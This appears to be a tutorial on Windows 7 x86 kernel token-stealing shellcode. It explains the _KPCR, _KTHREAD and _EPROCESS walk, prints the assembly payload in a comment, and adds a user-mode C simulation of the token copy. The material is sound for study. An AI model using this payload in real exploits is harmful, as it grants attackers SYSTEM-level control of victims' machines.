#Kernel_Land #Privilege #Shellcode (Win7)

#Iran

One way to obtain SYSTEM-level access on Windows 7 from kernel mode is to walk the kernel's own per-processor and per-thread bookkeeping. In kernel mode on x86 the fs segment points at the KPCR (Kernel Processor Control Region). Its PrcbData field (nt!_KPCR + 0x120) holds the _KPRCB, and the _KPRCB's CurrentThread pointer sits at +0x004, so with EAX cleared the current _KTHREAD is fetched with a single read at fs:[0x124]:

mov eax, [fs: eax + 0x124]

In the _KTHREAD structure, the ApcState field (a _KAPC_STATE) lies at +0x040, and inside _KAPC_STATE the Process pointer lies at +0x010, so the current process's _KPROCESS is at +0x050 from the thread. Because _KPROCESS is the first member (Pcb) of _EPROCESS, that pointer is also the address of the _EPROCESS. On 32-bit Windows the result lands in EAX; the 64-bit kernel does the same walk through RAX, with its own (different) offsets.

mov eax, [eax + 0x50]

These two reads are exactly what the kernel's PsGetCurrentProcess function does. From our own _EPROCESS, read UniqueProcessId to identify the process we are running in, then walk the ActiveProcessLinks list. ActiveProcessLinks is a LIST_ENTRY whose Flink and Blink point to the ActiveProcessLinks field of the neighbouring _EPROCESS blocks, so the field offset must be subtracted from each pointer to recover the containing structure. Walk forwards or backwards until UniqueProcessId equals 4 (the System process), then copy that process's Token field over the Token of our own process. When execution returns to user mode the calling process runs with SYSTEM's token. The field offsets inside _EPROCESS (UniqueProcessId, ActiveProcessLinks, Token) change between Windows builds, so they must be confirmed for the target with WinDbg (dt nt!_EPROCESS) before the shellcode is assembled …
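The following is an added example and not code from the original post. It models the whole walk above in user-mode C so it can be run and checked offline: an _EPROCESS stand-in is emulated with byte buffers, three processes are linked in a constructed ActiveProcessLinks ring, and steal_system_token() performs the same Flink walk, PID compare and Token copy that the kernel shellcode performs. The offsets 0xb4 (UniqueProcessId), 0xb8 (ActiveProcessLinks) and 0xf8 (Token) are the Windows 7 SP1 x86 values and are assumed here; the token values and PIDs in the sample list are made up. The x86 assembly in the leading comment is the kernel-mode form of the same steps.

```c
/*
 * Added example: user-mode model of the Win7 SP1 x86 token-stealing walk.
 * Offsets below are assumed for illustration; confirm on the target with
 * WinDbg: dt nt!_EPROCESS UniqueProcessId ActiveProcessLinks Token
 *
 * Kernel-mode shellcode this models (x86, Win7 SP1):
 *     xor eax, eax
 *     mov eax, fs:[eax + 0x124]   ; _KPCR.PrcbData.CurrentThread
 *     mov eax, [eax + 0x50]       ; _KTHREAD.ApcState.Process -> _EPROCESS
 *     mov ecx, eax                ; ecx = our _EPROCESS
 *     mov edx, 4                  ; System PID
 * next:
 *     mov eax, [eax + 0xb8]       ; ActiveProcessLinks.Flink
 *     sub eax, 0xb8               ; back to the containing _EPROCESS
 *     cmp [eax + 0xb4], edx       ; UniqueProcessId == 4 ?
 *     jne next
 *     mov edx, [eax + 0xf8]       ; System's Token
 *     mov [ecx + 0xf8], edx       ; overwrite our Token
 */
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OFF_UNIQUEPROCESSID    0xb4   /* assumed Win7 SP1 x86 offsets */
#define OFF_ACTIVEPROCESSLINKS 0xb8
#define OFF_TOKEN              0xf8
#define SYSTEM_PID             4u

typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;

/* Opaque _EPROCESS stand-in; the union forces 8-byte alignment so the
   LIST_ENTRY overlaid at OFF_ACTIVEPROCESSLINKS is properly aligned. */
typedef union { uint8_t b[0x200]; uint64_t align; } EPROCESS;

static uint32_t   *pid_of(EPROCESS *p)   { return (uint32_t *)(p->b + OFF_UNIQUEPROCESSID); }
static LIST_ENTRY *links_of(EPROCESS *p) { return (LIST_ENTRY *)(p->b + OFF_ACTIVEPROCESSLINKS); }
static uint32_t   *token_of(EPROCESS *p) { return (uint32_t *)(p->b + OFF_TOKEN); }

/* CONTAINING_RECORD(entry, _EPROCESS, ActiveProcessLinks): the "sub eax, 0xb8" */
static EPROCESS *eprocess_from_links(LIST_ENTRY *e)
{
    return (EPROCESS *)((uint8_t *)e - OFF_ACTIVEPROCESSLINKS);
}

/* The shellcode loop: follow Flink from the current process until
   UniqueProcessId == 4, then copy that process's Token over ours.
   Returns 1 on success, 0 if the ring was walked without finding System
   (the real shellcode has no such guard; System always exists). */
int steal_system_token(EPROCESS *current)
{
    LIST_ENTRY *start = links_of(current);
    for (LIST_ENTRY *e = start->Flink; e != start; e = e->Flink) {
        EPROCESS *cand = eprocess_from_links(e);
        if (*pid_of(cand) == SYSTEM_PID) {
            *token_of(current) = *token_of(cand);   /* the privilege swap */
            return 1;
        }
    }
    return 0;
}

/* Constructed three-entry ring (System, a service, our low-privilege
   process), doubly linked like nt!PsActiveProcessHead links real
   _EPROCESS blocks.  PIDs and token values are made up. */
static EPROCESS procs[3];

EPROCESS *build_process_list(int include_system)
{
    uint32_t pids[3]   = { include_system ? SYSTEM_PID : 8u, 612u, 2048u };
    uint32_t tokens[3] = { 0x8a7c1000u, 0x8b2d4000u, 0x9c3e8000u };
    memset(procs, 0, sizeof procs);
    for (int i = 0; i < 3; i++) {
        *pid_of(&procs[i])   = pids[i];
        *token_of(&procs[i]) = tokens[i];
        links_of(&procs[i])->Flink = links_of(&procs[(i + 1) % 3]);
        links_of(&procs[i])->Blink = links_of(&procs[(i + 2) % 3]);
    }
    return &procs[2];   /* "current": the unprivileged process */
}

/* Result helpers so the outcome can be checked rather than only printed. */
uint32_t token_after_steal(int include_system)
{
    EPROCESS *cur = build_process_list(include_system);
    steal_system_token(cur);
    return *token_of(cur);
}

int steal_result(int include_system)
{
    return steal_system_token(build_process_list(include_system));
}

int main(void)
{
    EPROCESS *cur = build_process_list(1);
    printf("before: pid=%" PRIu32 " token=0x%08" PRIx32 "\n", *pid_of(cur), *token_of(cur));
    int ok = steal_system_token(cur);
    printf("after:  pid=%" PRIu32 " token=0x%08" PRIx32 " (found System: %d)\n",
           *pid_of(cur), *token_of(cur), ok);
    return ok ? 0 : 1;
}
```

The model keeps the walk identical to the shellcode: it never dereferences a field by name, only by the offset macros, so swapping the three macros for another build's values is the only change needed to follow a different _EPROCESS layout.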
